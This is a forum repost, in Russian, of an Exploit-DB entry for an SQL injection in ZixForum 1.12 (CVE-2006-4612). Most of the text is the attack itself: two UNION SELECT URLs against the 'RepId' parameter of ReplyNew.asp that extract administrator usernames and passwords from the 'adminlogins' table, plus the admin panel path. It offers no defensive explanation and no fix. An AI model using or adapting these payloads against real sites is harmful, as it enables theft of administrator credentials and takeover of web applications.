Exploit Zix Forum 1.12 - 'RepId' SQL Injection (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2306
Проверка EDB
  1. Пройдено
Автор
CHIRONEX FLECKERI
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2006-4612
Дата публикации
2006-09-05
Код:
################################################################################
##                                                                            ##
##  ©ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  Mail             |  [email protected]                          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################

# milw0rm.com [2006-09-05]
 
Источник
www.exploit-db.com

Похожие темы